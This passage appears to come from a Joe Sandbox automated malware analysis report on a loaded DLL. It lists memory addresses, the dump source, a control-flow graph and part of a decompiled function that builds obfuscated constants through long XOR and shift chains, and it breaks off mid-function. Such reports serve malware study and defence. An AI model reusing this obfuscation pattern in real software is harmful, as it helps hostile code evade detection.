                                                                                                                                                                            0x02f5b3cf
                                                                                                                                                                            0x02f5b3d3
                                                                                                                                                                            0x02f5b3e2
                                                                                                                                                                            0x02f5b3e7
                                                                                                                                                                            0x02f5b3ee
                                                                                                                                                                            0x02f5b3ee
                                                                                                                                                                            0x02f5b3f0
                                                                                                                                                                            0x02f5b3f0
                                                                                                                                                                            0x02f5b3f0
                                                                                                                                                                            0x02f5b3f0
                                                                                                                                                                            0x02f5b3f6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b3fc
                                                                                                                                                                            0x02f5b668
                                                                                                                                                                            0x02f5b66e
                                                                                                                                                                            0x02f5b66f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b402
                                                                                                                                                                            0x02f5b408
                                                                                                                                                                            0x02f5b5b7
                                                                                                                                                                            0x02f5b5c0
                                                                                                                                                                            0x02f5b5c4
                                                                                                                                                                            0x02f5b5da
                                                                                                                                                                            0x02f5b61d
                                                                                                                                                                            0x02f5b629
                                                                                                                                                                            0x02f5b640
                                                                                                                                                                            0x02f5b645
                                                                                                                                                                            0x02f5b648
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b40e
                                                                                                                                                                            0x02f5b414
                                                                                                                                                                            0x02f5b57a
                                                                                                                                                                            0x02f5b599
                                                                                                                                                                            0x02f5b5a5
                                                                                                                                                                            0x02f5b5aa
                                                                                                                                                                            0x02f5b5ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b41a
                                                                                                                                                                            0x02f5b420
                                                                                                                                                                            0x02f5b473
                                                                                                                                                                            0x02f5b49b
                                                                                                                                                                            0x02f5b4bc
                                                                                                                                                                            0x02f5b4c9
                                                                                                                                                                            0x02f5b4cd
                                                                                                                                                                            0x02f5b4d4
                                                                                                                                                                            0x02f5b523
                                                                                                                                                                            0x02f5b543
                                                                                                                                                                            0x02f5b548
                                                                                                                                                                            0x02f5b561
                                                                                                                                                                            0x02f5b567
                                                                                                                                                                            0x02f5b568
                                                                                                                                                                            0x02f5b56a
                                                                                                                                                                            0x02f5b570
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b570
                                                                                                                                                                            0x02f5b422
                                                                                                                                                                            0x02f5b428
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b814
                                                                                                                                                                            0x02f5b434
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b43a
                                                                                                                                                                            0x02f5b451
                                                                                                                                                                            0x02f5b457
                                                                                                                                                                            0x02f5b458
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b458
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b434
                                                                                                                                                                            0x02f5b420
                                                                                                                                                                            0x02f5b414
                                                                                                                                                                            0x02f5b408
                                                                                                                                                                            0x02f5b81f
                                                                                                                                                                            0x02f5b81f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b81f
                                                                                                                                                                            0x02f5b679
                                                                                                                                                                            0x02f5b67f
                                                                                                                                                                            0x02f5b7d3
                                                                                                                                                                            0x02f5b7d8
                                                                                                                                                                            0x02f5b7db
                                                                                                                                                                            0x02f5b7dc
                                                                                                                                                                            0x02f5b7de
                                                                                                                                                                            0x02f5b7ea
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b7e0
                                                                                                                                                                            0x02f5b7e0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b7e0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b685
                                                                                                                                                                            0x02f5b685
                                                                                                                                                                            0x02f5b68b
                                                                                                                                                                            0x02f5b78e
                                                                                                                                                                            0x02f5b79c
                                                                                                                                                                            0x02f5b7a6
                                                                                                                                                                            0x02f5b7ae
                                                                                                                                                                            0x02f5b7af
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b691
                                                                                                                                                                            0x02f5b691
                                                                                                                                                                            0x02f5b697
                                                                                                                                                                            0x02f5b753
                                                                                                                                                                            0x02f5b767
                                                                                                                                                                            0x02f5b76e
                                                                                                                                                                            0x02f5b773
                                                                                                                                                                            0x02f5b776
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b69d
                                                                                                                                                                            0x02f5b69d
                                                                                                                                                                            0x02f5b6a3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b6a9
                                                                                                                                                                            0x02f5b6c3
                                                                                                                                                                            0x02f5b6ca
                                                                                                                                                                            0x02f5b6cf
                                                                                                                                                                            0x02f5b6ed
                                                                                                                                                                            0x02f5b71c
                                                                                                                                                                            0x02f5b723
                                                                                                                                                                            0x02f5b728
                                                                                                                                                                            0x02f5b72b
                                                                                                                                                                            0x02f5b72d
                                                                                                                                                                            0x02f5b733
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b733
                                                                                                                                                                            0x02f5b72d
                                                                                                                                                                            0x02f5b6a3
                                                                                                                                                                            0x02f5b697
                                                                                                                                                                            0x02f5b68b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5b7ef
                                                                                                                                                                            0x02f5b7ef
                                                                                                                                                                            0x02f5b7ef
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
                                                                                                                                                                            • API String ID: 0-4215899151
                                                                                                                                                                            • Opcode ID: 0f1176db1aaccfa6f868932e93091040ad3b82e31f51054b3b3012f4f5f9d337
                                                                                                                                                                            • Instruction ID: 6ca25e3507dadb758636a7c3c690f781a4580fcfa3c22598b5d1c23249bed0b8
                                                                                                                                                                            • Opcode Fuzzy Hash: 0f1176db1aaccfa6f868932e93091040ad3b82e31f51054b3b3012f4f5f9d337
                                                                                                                                                                            • Instruction Fuzzy Hash: B972E0725083819FD378CF21D94AB8BBBE2BBC4348F10891DE6D996260DBB19559CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 334 2f60f86-2f61c74 335 2f61c7c 334->335 336 2f61c81 335->336 337 2f61c86 336->337 338 2f61c8b-2f61c91 337->338 339 2f61c97 338->339 340 2f61f14-2f61f1a 338->340 341 2f61c9d-2f61ca3 339->341 342 2f61eea-2f61f0f call 2f6c237 339->342 343 2f61f20-2f61f22 340->343 344 2f6204f-2f620f3 call 2f6e1f8 call 2f5bc32 call 2f6fecb 340->344 345 2f61e0d-2f61ee5 call 2f6e1f8 * 2 call 2f5738a call 2f6fecb * 2 341->345 346 2f61ca9-2f61caf 341->346 342->335 348 2f6200d-2f6204a call 2f551e7 343->348 349 2f61f28-2f61f2e 343->349 397 2f620f6-2f62105 344->397 345->397 351 2f61cb5-2f61cb7 346->351 352 2f61dee-2f61e08 call 2f52ebf 346->352 348->335 356 2f61f34-2f61f3a 349->356 357 2f61fe0-2f62008 call 2f6c237 349->357 363 2f61cf7-2f61d85 call 2f6e1f8 call 2f716c0 351->363 364 2f61cb9-2f61cbf 351->364 352->335 360 2f61f7e-2f61fdb call 2f743e6 356->360 361 2f61f3c-2f61f3e 356->361 357->335 360->337 370 2f61f44-2f61f79 call 2f6c2cf 361->370 371 2f6210a-2f62110 361->371 399 2f61d87-2f61dbc call 2f6c9b0 363->399 400 2f61dbe 363->400 374 2f61cc5-2f61cc7 364->374 375 2f62118-2f62134 call 2f5f7fe 364->375 370->336 371->338 382 2f62116 371->382 385 2f61cdc-2f61cf5 call 2f53431 374->385 386 2f61cc9-2f61ccf 374->386 391 2f62135-2f62141 375->391 382->391 385->335 386->371 393 2f61cd5-2f61cda 386->393 393->338 397->371 404 2f61dc3-2f61de9 call 2f6fecb 399->404 400->404 404->397
                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F60F86(intOrPtr* __ecx) {
                                                                                                                                                                            				char _v68;
                                                                                                                                                                            				char _v76;
                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                            				intOrPtr* _v96;
                                                                                                                                                                            				char _v100;
                                                                                                                                                                            				char _v104;
                                                                                                                                                                            				char _v108;
                                                                                                                                                                            				char _v112;
                                                                                                                                                                            				char _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				signed int _v212;
                                                                                                                                                                            				signed int _v216;
                                                                                                                                                                            				signed int _v220;
                                                                                                                                                                            				signed int _v224;
                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                            				signed int _v232;
                                                                                                                                                                            				signed int _v236;
                                                                                                                                                                            				signed int _v240;
                                                                                                                                                                            				signed int _v244;
                                                                                                                                                                            				signed int _v248;
                                                                                                                                                                            				signed int _v252;
                                                                                                                                                                            				signed int _v256;
                                                                                                                                                                            				signed int _v260;
                                                                                                                                                                            				signed int _v264;
                                                                                                                                                                            				signed int _v268;
                                                                                                                                                                            				signed int _v272;
                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                            				signed int _v284;
                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                            				signed int _v292;
                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                            				signed int _v300;
                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                            				signed int _v308;
                                                                                                                                                                            				signed int _v312;
                                                                                                                                                                            				signed int _v316;
                                                                                                                                                                            				signed int _v320;
                                                                                                                                                                            				signed int _v324;
                                                                                                                                                                            				signed int _v328;
                                                                                                                                                                            				signed int _v332;
                                                                                                                                                                            				signed int _v336;
                                                                                                                                                                            				signed int _v340;
                                                                                                                                                                            				signed int _v344;
                                                                                                                                                                            				signed int _v348;
                                                                                                                                                                            				signed int _v352;
                                                                                                                                                                            				signed int _v356;
                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                            				signed int _v364;
                                                                                                                                                                            				signed int _v368;
                                                                                                                                                                            				signed int _v372;
                                                                                                                                                                            				signed int _v376;
                                                                                                                                                                            				signed int _v380;
                                                                                                                                                                            				signed int _v384;
                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                            				signed int _v392;
                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                            				signed int _v412;
                                                                                                                                                                            				signed int _v416;
                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                            				signed int _v428;
                                                                                                                                                                            				signed int _v432;
                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                            				signed int _v440;
                                                                                                                                                                            				void* _t824;
                                                                                                                                                                            				void* _t825;
                                                                                                                                                                            				void* _t829;
                                                                                                                                                                            				void* _t832;
                                                                                                                                                                            				void* _t844;
                                                                                                                                                                            				void* _t850;
                                                                                                                                                                            				void* _t853;
                                                                                                                                                                            				signed int _t860;
                                                                                                                                                                            				signed int _t861;
                                                                                                                                                                            				signed int _t862;
                                                                                                                                                                            				signed int _t863;
                                                                                                                                                                            				signed int _t864;
                                                                                                                                                                            				signed int _t865;
                                                                                                                                                                            				signed int _t866;
                                                                                                                                                                            				signed int _t867;
                                                                                                                                                                            				signed int _t868;
                                                                                                                                                                            				signed int _t869;
                                                                                                                                                                            				signed int _t870;
                                                                                                                                                                            				signed int _t871;
                                                                                                                                                                            				signed int _t872;
                                                                                                                                                                            				signed int _t873;
                                                                                                                                                                            				signed int _t874;
                                                                                                                                                                            				signed int _t875;
                                                                                                                                                                            				signed int _t876;
                                                                                                                                                                            				void* _t882;
                                                                                                                                                                            				void* _t901;
                                                                                                                                                                            				void* _t957;
                                                                                                                                                                            				intOrPtr _t975;
                                                                                                                                                                            				intOrPtr* _t978;
                                                                                                                                                                            				signed int _t980;
                                                                                                                                                                            				signed int _t981;
                                                                                                                                                                            				void* _t982;
                                                                                                                                                                            				intOrPtr _t986;
                                                                                                                                                                            				void* _t987;
                                                                                                                                                                            				void* _t994;
                                                                                                                                                                            				void* _t996;
                                                                                                                                                                            
                                                                                                                                                                            				_t978 = __ecx;
                                                                                                                                                                            				_v96 = __ecx;
                                                                                                                                                                            				_v88 = 0xce16ef;
                                                                                                                                                                            				_t986 = 0;
                                                                                                                                                                            				_t853 = 0x87433f6;
                                                                                                                                                                            				_v84 = 0;
                                                                                                                                                                            				_v80 = 0;
                                                                                                                                                                            				_v412 = 0xef09b0;
                                                                                                                                                                            				_v412 = _v412 + 0xffff239a;
                                                                                                                                                                            				_v412 = _v412 >> 0xe;
                                                                                                                                                                            				_v412 = _v412 + 0xffffb1af;
                                                                                                                                                                            				_v412 = _v412 ^ 0xffffb567;
                                                                                                                                                                            				_v144 = 0xb2550e;
                                                                                                                                                                            				_v144 = _v144 << 6;
                                                                                                                                                                            				_v144 = _v144 ^ 0x2c954380;
                                                                                                                                                                            				_v160 = 0xa1df5c;
                                                                                                                                                                            				_v160 = _v160 * 0x60;
                                                                                                                                                                            				_v160 = _v160 ^ 0x3cb3c280;
                                                                                                                                                                            				_v288 = 0x7a32d8;
                                                                                                                                                                            				_v288 = _v288 | 0x8c6c9666;
                                                                                                                                                                            				_v288 = _v288 ^ 0x041f8caf;
                                                                                                                                                                            				_v288 = _v288 ^ 0x88613a51;
                                                                                                                                                                            				_v348 = 0xdf5e12;
                                                                                                                                                                            				_v348 = _v348 | 0xa5ea5eb7;
                                                                                                                                                                            				_v348 = _v348 ^ 0xa5ff5eb7;
                                                                                                                                                                            				_v296 = 0x7009ff;
                                                                                                                                                                            				_v296 = _v296 + 0xffff1527;
                                                                                                                                                                            				_v296 = _v296 + 0x576a;
                                                                                                                                                                            				_v296 = _v296 ^ 0x006f7690;
                                                                                                                                                                            				_v372 = 0x1f54b;
                                                                                                                                                                            				_t860 = 0x52;
                                                                                                                                                                            				_v372 = _v372 * 0x5a;
                                                                                                                                                                            				_v372 = _v372 >> 0xb;
                                                                                                                                                                            				_v372 = _v372 / _t860;
                                                                                                                                                                            				_v372 = _v372 ^ 0x00000044;
                                                                                                                                                                            				_v332 = 0x772df1;
                                                                                                                                                                            				_v332 = _v332 + 0x4853;
                                                                                                                                                                            				_v332 = _v332 ^ 0x166147d5;
                                                                                                                                                                            				_v332 = _v332 ^ 0x16163191;
                                                                                                                                                                            				_v240 = 0x1a1abb;
                                                                                                                                                                            				_v240 = _v240 ^ 0xbdfc81b5;
                                                                                                                                                                            				_v240 = _v240 | 0x1ef02f35;
                                                                                                                                                                            				_v240 = _v240 ^ 0xbff6bf3f;
                                                                                                                                                                            				_v232 = 0x620327;
                                                                                                                                                                            				_v232 = _v232 + 0xffffc934;
                                                                                                                                                                            				_t861 = 0x13;
                                                                                                                                                                            				_v232 = _v232 / _t861;
                                                                                                                                                                            				_v232 = _v232 ^ 0x000525b3;
                                                                                                                                                                            				_v208 = 0xe2fff2;
                                                                                                                                                                            				_t980 = 0x39;
                                                                                                                                                                            				_v208 = _v208 * 0x78;
                                                                                                                                                                            				_v208 = _v208 ^ 0x6a67f970;
                                                                                                                                                                            				_v344 = 0xf3734c;
                                                                                                                                                                            				_v344 = _v344 >> 0x10;
                                                                                                                                                                            				_v344 = _v344 / _t980;
                                                                                                                                                                            				_v344 = _v344 ^ 0x00000004;
                                                                                                                                                                            				_v300 = 0x170e40;
                                                                                                                                                                            				_v300 = _v300 | 0xfbde795f;
                                                                                                                                                                            				_v300 = _v300 ^ 0xfbde9330;
                                                                                                                                                                            				_v260 = 0xd4f3ae;
                                                                                                                                                                            				_v260 = _v260 ^ 0x9e22b963;
                                                                                                                                                                            				_v260 = _v260 * 0x2e;
                                                                                                                                                                            				_v260 = _v260 ^ 0x904fea8f;
                                                                                                                                                                            				_v356 = 0x4c8d9b;
                                                                                                                                                                            				_v356 = _v356 | 0xd47535dd;
                                                                                                                                                                            				_v356 = _v356 + 0xffffd433;
                                                                                                                                                                            				_t862 = 0x64;
                                                                                                                                                                            				_v356 = _v356 * 0x59;
                                                                                                                                                                            				_v356 = _v356 ^ 0xdfa15942;
                                                                                                                                                                            				_v308 = 0xbd9260;
                                                                                                                                                                            				_v308 = _v308 >> 0xe;
                                                                                                                                                                            				_v308 = _v308 * 0x79;
                                                                                                                                                                            				_v308 = _v308 ^ 0x000cbe7b;
                                                                                                                                                                            				_v252 = 0xa2f51d;
                                                                                                                                                                            				_v252 = _v252 + 0x749;
                                                                                                                                                                            				_v252 = _v252 << 0xd;
                                                                                                                                                                            				_v252 = _v252 ^ 0x5f854687;
                                                                                                                                                                            				_v292 = 0x216e58;
                                                                                                                                                                            				_v292 = _v292 / _t862;
                                                                                                                                                                            				_v292 = _v292 + 0xffff8880;
                                                                                                                                                                            				_v292 = _v292 ^ 0xfff3b1bc;
                                                                                                                                                                            				_v176 = 0xac4eb4;
                                                                                                                                                                            				_v176 = _v176 | 0xd866b52c;
                                                                                                                                                                            				_v176 = _v176 ^ 0xd8e8b8b7;
                                                                                                                                                                            				_v236 = 0x7a6201;
                                                                                                                                                                            				_v236 = _v236 ^ 0x2461ec4e;
                                                                                                                                                                            				_t863 = 0xa;
                                                                                                                                                                            				_v236 = _v236 * 0x35;
                                                                                                                                                                            				_v236 = _v236 ^ 0x79bb4b53;
                                                                                                                                                                            				_v220 = 0xf5a9fb;
                                                                                                                                                                            				_v220 = _v220 << 1;
                                                                                                                                                                            				_v220 = _v220 >> 5;
                                                                                                                                                                            				_v220 = _v220 ^ 0x000a39a7;
                                                                                                                                                                            				_v380 = 0x7beff6;
                                                                                                                                                                            				_v380 = _v380 / _t863;
                                                                                                                                                                            				_v380 = _v380 | 0x5a206f9b;
                                                                                                                                                                            				_v380 = _v380 * 0x3d;
                                                                                                                                                                            				_v380 = _v380 ^ 0x7c9823d9;
                                                                                                                                                                            				_v284 = 0xdc7201;
                                                                                                                                                                            				_v284 = _v284 ^ 0xec4f9d75;
                                                                                                                                                                            				_v284 = _v284 << 8;
                                                                                                                                                                            				_v284 = _v284 ^ 0x93e140b6;
                                                                                                                                                                            				_v396 = 0x36b797;
                                                                                                                                                                            				_v396 = _v396 + 0x83f2;
                                                                                                                                                                            				_v396 = _v396 | 0xb5da4ffa;
                                                                                                                                                                            				_v396 = _v396 ^ 0x8c9f27f1;
                                                                                                                                                                            				_v396 = _v396 ^ 0x3962cb66;
                                                                                                                                                                            				_v364 = 0x608af6;
                                                                                                                                                                            				_v364 = _v364 >> 0xe;
                                                                                                                                                                            				_v364 = _v364 ^ 0xb06c2668;
                                                                                                                                                                            				_v364 = _v364 >> 0xa;
                                                                                                                                                                            				_v364 = _v364 ^ 0x0022b374;
                                                                                                                                                                            				_v404 = 0xe18b1f;
                                                                                                                                                                            				_v404 = _v404 + 0xffff49de;
                                                                                                                                                                            				_v404 = _v404 + 0xffffa950;
                                                                                                                                                                            				_v404 = _v404 >> 5;
                                                                                                                                                                            				_v404 = _v404 ^ 0x000802e7;
                                                                                                                                                                            				_v168 = 0x720eed;
                                                                                                                                                                            				_v168 = _v168 | 0xf4577aa8;
                                                                                                                                                                            				_v168 = _v168 ^ 0xf4704e8f;
                                                                                                                                                                            				_v328 = 0x5e39f;
                                                                                                                                                                            				_v328 = _v328 * 0x2a;
                                                                                                                                                                            				_v328 = _v328 ^ 0x47860790;
                                                                                                                                                                            				_v328 = _v328 ^ 0x47706e69;
                                                                                                                                                                            				_v336 = 0xdd3db6;
                                                                                                                                                                            				_v336 = _v336 ^ 0x0be1064e;
                                                                                                                                                                            				_v336 = _v336 ^ 0xe0fa941c;
                                                                                                                                                                            				_v336 = _v336 ^ 0xebc1ff07;
                                                                                                                                                                            				_v340 = 0x8bacdf;
                                                                                                                                                                            				_t864 = 0x49;
                                                                                                                                                                            				_v340 = _v340 / _t864;
                                                                                                                                                                            				_t865 = 0x77;
                                                                                                                                                                            				_v340 = _v340 * 0x4d;
                                                                                                                                                                            				_v340 = _v340 ^ 0x0099a7e7;
                                                                                                                                                                            				_v440 = 0x29fcf0;
                                                                                                                                                                            				_v440 = _v440 >> 4;
                                                                                                                                                                            				_v440 = _v440 ^ 0x37539152;
                                                                                                                                                                            				_v440 = _v440 / _t865;
                                                                                                                                                                            				_v440 = _v440 ^ 0x007580f6;
                                                                                                                                                                            				_v400 = 0x753dd5;
                                                                                                                                                                            				_v400 = _v400 ^ 0x142a6b84;
                                                                                                                                                                            				_v400 = _v400 ^ 0x6d30c2ad;
                                                                                                                                                                            				_v400 = _v400 ^ 0xe014bebf;
                                                                                                                                                                            				_v400 = _v400 ^ 0x997c2220;
                                                                                                                                                                            				_v128 = 0x8b3cd;
                                                                                                                                                                            				_v128 = _v128 << 2;
                                                                                                                                                                            				_v128 = _v128 ^ 0x002b9a55;
                                                                                                                                                                            				_v408 = 0x5fd2f;
                                                                                                                                                                            				_v408 = _v408 >> 9;
                                                                                                                                                                            				_t866 = 0x69;
                                                                                                                                                                            				_v408 = _v408 * 0x53;
                                                                                                                                                                            				_v408 = _v408 * 0x58;
                                                                                                                                                                            				_v408 = _v408 ^ 0x00501640;
                                                                                                                                                                            				_v416 = 0x7e5e32;
                                                                                                                                                                            				_v416 = _v416 | 0x37c3b1cb;
                                                                                                                                                                            				_v416 = _v416 + 0x4e4b;
                                                                                                                                                                            				_v416 = _v416 | 0xc7e68b70;
                                                                                                                                                                            				_v416 = _v416 ^ 0xffec3e94;
                                                                                                                                                                            				_v304 = 0xac72e0;
                                                                                                                                                                            				_v304 = _v304 + 0xffff9516;
                                                                                                                                                                            				_v304 = _v304 | 0x0ab72207;
                                                                                                                                                                            				_v304 = _v304 ^ 0x0aba1474;
                                                                                                                                                                            				_v424 = 0x91a63a;
                                                                                                                                                                            				_v424 = _v424 | 0xeda6ffa9;
                                                                                                                                                                            				_v424 = _v424 ^ 0xa7761782;
                                                                                                                                                                            				_v424 = _v424 << 0xe;
                                                                                                                                                                            				_v424 = _v424 ^ 0x7a08e30a;
                                                                                                                                                                            				_v436 = 0x9e7f8b;
                                                                                                                                                                            				_v436 = _v436 | 0x84ca61f6;
                                                                                                                                                                            				_v436 = _v436 << 2;
                                                                                                                                                                            				_v436 = _v436 * 0x3e;
                                                                                                                                                                            				_v436 = _v436 ^ 0xb78cfbfa;
                                                                                                                                                                            				_v216 = 0x303808;
                                                                                                                                                                            				_v216 = _v216 + 0xef78;
                                                                                                                                                                            				_v216 = _v216 / _t980;
                                                                                                                                                                            				_v216 = _v216 ^ 0x000455e2;
                                                                                                                                                                            				_v312 = 0x19b522;
                                                                                                                                                                            				_v312 = _v312 << 7;
                                                                                                                                                                            				_v312 = _v312 ^ 0x11162953;
                                                                                                                                                                            				_v312 = _v312 ^ 0x1dcfd305;
                                                                                                                                                                            				_v212 = 0x8a6fc0;
                                                                                                                                                                            				_v212 = _v212 << 9;
                                                                                                                                                                            				_v212 = _v212 ^ 0x14d4ca12;
                                                                                                                                                                            				_v276 = 0xdb7845;
                                                                                                                                                                            				_v276 = _v276 / _t866;
                                                                                                                                                                            				_v276 = _v276 * 0x1c;
                                                                                                                                                                            				_v276 = _v276 ^ 0x003237f1;
                                                                                                                                                                            				_v124 = 0x91e545;
                                                                                                                                                                            				_t867 = 0x7b;
                                                                                                                                                                            				_v124 = _v124 / _t867;
                                                                                                                                                                            				_v124 = _v124 ^ 0x0004745c;
                                                                                                                                                                            				_v192 = 0x2154b3;
                                                                                                                                                                            				_v192 = _v192 ^ 0x5324a52c;
                                                                                                                                                                            				_v192 = _v192 ^ 0x530d1a47;
                                                                                                                                                                            				_v140 = 0x7913eb;
                                                                                                                                                                            				_v140 = _v140 | 0xe487e648;
                                                                                                                                                                            				_v140 = _v140 ^ 0xe4fd51cb;
                                                                                                                                                                            				_v428 = 0x8a554f;
                                                                                                                                                                            				_v428 = _v428 << 1;
                                                                                                                                                                            				_v428 = _v428 + 0xffff493d;
                                                                                                                                                                            				_v428 = _v428 | 0x8f4663f4;
                                                                                                                                                                            				_v428 = _v428 ^ 0x8f592165;
                                                                                                                                                                            				_v200 = 0x5c4830;
                                                                                                                                                                            				_v200 = _v200 + 0xffffe35d;
                                                                                                                                                                            				_v200 = _v200 ^ 0x00549f8c;
                                                                                                                                                                            				_v132 = 0x6e2e79;
                                                                                                                                                                            				_t377 =  &_v132; // 0x6e2e79
                                                                                                                                                                            				_t981 = 0x62;
                                                                                                                                                                            				_v132 =  *_t377 / _t981;
                                                                                                                                                                            				_v132 = _v132 ^ 0x000a369f;
                                                                                                                                                                            				_v244 = 0x1d0d9a;
                                                                                                                                                                            				_t868 = 0x6e;
                                                                                                                                                                            				_v244 = _v244 / _t868;
                                                                                                                                                                            				_v244 = _v244 ^ 0xec9a9004;
                                                                                                                                                                            				_v244 = _v244 ^ 0xec94e609;
                                                                                                                                                                            				_v148 = 0xd4a92;
                                                                                                                                                                            				_v148 = _v148 + 0xffffbc3f;
                                                                                                                                                                            				_v148 = _v148 ^ 0x00088ca7;
                                                                                                                                                                            				_v184 = 0x3666a0;
                                                                                                                                                                            				_v184 = _v184 >> 0xb;
                                                                                                                                                                            				_v184 = _v184 ^ 0x00096f18;
                                                                                                                                                                            				_v228 = 0x713966;
                                                                                                                                                                            				_v228 = _v228 << 3;
                                                                                                                                                                            				_v228 = _v228 << 0xb;
                                                                                                                                                                            				_v228 = _v228 ^ 0x4e5b426e;
                                                                                                                                                                            				_v316 = 0xec09e9;
                                                                                                                                                                            				_v316 = _v316 << 7;
                                                                                                                                                                            				_t869 = 0x78;
                                                                                                                                                                            				_v316 = _v316 / _t869;
                                                                                                                                                                            				_v316 = _v316 ^ 0x00fe5880;
                                                                                                                                                                            				_v268 = 0x8ffe81;
                                                                                                                                                                            				_v268 = _v268 + 0xffff4311;
                                                                                                                                                                            				_v268 = _v268 ^ 0x56e15418;
                                                                                                                                                                            				_v268 = _v268 ^ 0x566a144b;
                                                                                                                                                                            				_v324 = 0x9f4c2e;
                                                                                                                                                                            				_v324 = _v324 >> 4;
                                                                                                                                                                            				_v324 = _v324 | 0x903f3b4d;
                                                                                                                                                                            				_v324 = _v324 ^ 0x9031b6d7;
                                                                                                                                                                            				_v196 = 0x6080cf;
                                                                                                                                                                            				_v196 = _v196 << 0xe;
                                                                                                                                                                            				_v196 = _v196 ^ 0x203ba000;
                                                                                                                                                                            				_v256 = 0x4bba45;
                                                                                                                                                                            				_v256 = _v256 + 0xc17c;
                                                                                                                                                                            				_v256 = _v256 | 0x95e268b8;
                                                                                                                                                                            				_v256 = _v256 ^ 0x95e68234;
                                                                                                                                                                            				_v264 = 0x7821fc;
                                                                                                                                                                            				_v264 = _v264 << 3;
                                                                                                                                                                            				_t870 = 0x34;
                                                                                                                                                                            				_v264 = _v264 / _t870;
                                                                                                                                                                            				_v264 = _v264 ^ 0x001694e5;
                                                                                                                                                                            				_v204 = 0x96f3a5;
                                                                                                                                                                            				_v204 = _v204 * 0x24;
                                                                                                                                                                            				_v204 = _v204 ^ 0x153e3a4b;
                                                                                                                                                                            				_v368 = 0xbef911;
                                                                                                                                                                            				_t871 = 0xe;
                                                                                                                                                                            				_v368 = _v368 / _t871;
                                                                                                                                                                            				_v368 = _v368 >> 0xb;
                                                                                                                                                                            				_v368 = _v368 + 0x5de4;
                                                                                                                                                                            				_v368 = _v368 ^ 0x00021c01;
                                                                                                                                                                            				_v376 = 0x377d04;
                                                                                                                                                                            				_v376 = _v376 + 0xcef;
                                                                                                                                                                            				_v376 = _v376 ^ 0x9e466b70;
                                                                                                                                                                            				_t872 = 0x59;
                                                                                                                                                                            				_v376 = _v376 * 0x6b;
                                                                                                                                                                            				_v376 = _v376 ^ 0x399834bf;
                                                                                                                                                                            				_v180 = 0x6632ea;
                                                                                                                                                                            				_v180 = _v180 | 0x3a3e38fd;
                                                                                                                                                                            				_v180 = _v180 ^ 0x3a73a81b;
                                                                                                                                                                            				_v248 = 0x142cd9;
                                                                                                                                                                            				_v248 = _v248 / _t872;
                                                                                                                                                                            				_v248 = _v248 / _t981;
                                                                                                                                                                            				_v248 = _v248 ^ 0x0001d965;
